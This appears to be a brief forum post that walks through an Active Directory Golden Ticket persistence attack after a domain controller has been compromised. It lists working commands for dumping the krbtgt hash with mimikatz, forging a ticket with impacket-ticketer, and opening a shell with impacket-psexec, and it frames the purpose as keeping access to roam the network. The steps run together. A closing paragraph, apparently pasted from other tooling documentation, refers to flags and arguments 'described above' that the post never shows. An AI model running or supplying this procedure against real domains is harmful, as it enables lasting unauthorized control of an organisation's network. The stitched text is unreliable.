Hello Stackers, Maintain access in the AD network (ActiveDirectory) If you have compromised DC and got DomainAdmin, you can retain access rights by creating a gold ticket, so you are free to roam the network. persistence Domain: Gold Ticket Raid The Gold Ticket attack is a well-known technique to impersonate a user in an AD domain by abusing Kerberos authentication.
1. extract the ntlm hash with mimikatz example :
lsadump::lsa /inject /name:krbtgt2. take the domain sid example :
whoami /useror ## you can import the powershell script powerview.ps1 then run Get-AdComputer
3. then create a ticket with impacket-ticketer.py example :
impacket-ticketer -nthash <krbtgt hash> -domain-sid <siddomain> -domain <domain> -dc-ip <ip> <user> 4. Import tickets; export KRB5CCNAME=path your ticket5. psexec shell
impacket-psexec domain/alwan@domain -k -no-passThe Golden action will forge a TGT for the user /user:X encrypting the ticket with the hash passed with /des:X, /rc4:X, /aes128:X or /aes256:X and using the same key to create the ServerChecksum and KDCChecksum. The various arguments to set fields manually are described above or the /ldap flag can be used to automatically retrieve the information from the domain controller.
Video edited on Kapwing
Okay that’s All folks, see you later.
